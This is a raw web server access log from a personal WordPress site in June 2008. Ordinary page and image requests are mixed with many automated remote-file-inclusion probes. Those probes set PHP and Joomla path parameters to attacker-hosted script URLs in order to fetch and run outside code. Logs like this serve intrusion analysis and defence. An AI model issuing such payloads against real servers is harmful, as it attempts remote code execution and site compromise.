72.83.118.36 - - [08/Jun/2008:10:31:07 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:07 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:08 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:08 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:08 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:08 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:09 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:09 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:09 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:09 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:11 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&847 HTTP/1.1" 200 19014 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:11 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&12 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:13 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0084.jpg HTTP/1.1" 200 486728 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:31:15 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:31:15 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:16 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:31:17 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0149.jpg HTTP/1.1" 200 385604 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:31:22 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:31:23 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:33 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
66.230.197.245 - - [08/Jun/2008:10:31:34 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:10:31:35 -0700] "GET /inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:37 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.1" 200 352070 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:31:39 -0700] "GET /logs/dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [08/Jun/2008:10:31:39 -0700] "GET /dbase.php?action=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:31:49 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0095.jpg HTTP/1.1" 200 496796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:51 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:54 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:31:58 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
213.203.222.50 - - [08/Jun/2008:10:32:00 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:10:32:00 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:05 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:07 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:13 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:32:18 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:32:20 -0700] "GET /index2.php?DoAction=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:10:32:21 -0700] "GET /logs/index2.php?DoAction=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:32:21 -0700] "GET /logs/access_080312.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:32:21 -0700] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:32:22 -0700] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:32:24 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:32:24 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:34 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 200 348079 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 200 426309 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
67.15.205.17 - - [08/Jun/2008:10:32:45 -0700] "GET /logs/dbase.php?action=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:10:32:45 -0700] "GET /dbase.php?action=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:48 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0138_0.jpg HTTP/1.1" 200 386052 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
72.83.118.36 - - [08/Jun/2008:10:32:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0128.jpg HTTP/1.1" 200 538292 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0" "dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:33:31 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:10:33:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:10:33:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:33:52 -0700] "GET /logs/access_080305.log/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:33:53 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:10:33:54 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:34:03 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:34:05 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:10:34:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:34:21 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:10:34:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.160.45 - - [08/Jun/2008:10:34:21 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:34:25 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:34:26 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:34:28 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:34:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:34:29 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:34:29 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:10:34:29 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:10:34:38 -0700] "GET /logs/access_080429.log//modules/vwar/admin/admin.php?vwar_root=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:34:49 -0700] "GET /logs/access_080305.log/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:34:49 -0700] "GET /inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:34:49 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:10:35:30 -0700] "GET /logs/db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:10:35:30 -0700] "GET /db.php?path_local=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:35:50 -0700] "GET /logs/access_080312.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:35:50 -0700] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:35:50 -0700] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:35:59 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:36:00 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:10:36:00 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:36:05 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:36:05 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:10:36:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:36:21 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:36:22 -0700] "GET /logs/access_080308.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:36:22 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:36:23 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:36:23 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:10:36:46 -0700] "GET /logs/access_080110.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:10:36:53 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:10:36:54 -0700] "GET /inc/formmail.inc.php?script_root=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:10:36:55 -0700] "GET /logs/access_080215.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:36:57 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:10:37:09 -0700] "GET /index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 200 16811 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:10:37:19 -0700] "GET /logs/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.156.192.5 - - [08/Jun/2008:10:38:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:38:17 -0700] "GET /logs/access_080107.log/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:38:21 -0700] "GET /?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 200 16891 "-" "libwww-perl/5.79" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:39:27 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:39:30 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.97 - - [08/Jun/2008:10:39:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [08/Jun/2008:10:39:40 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:10:39:41 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
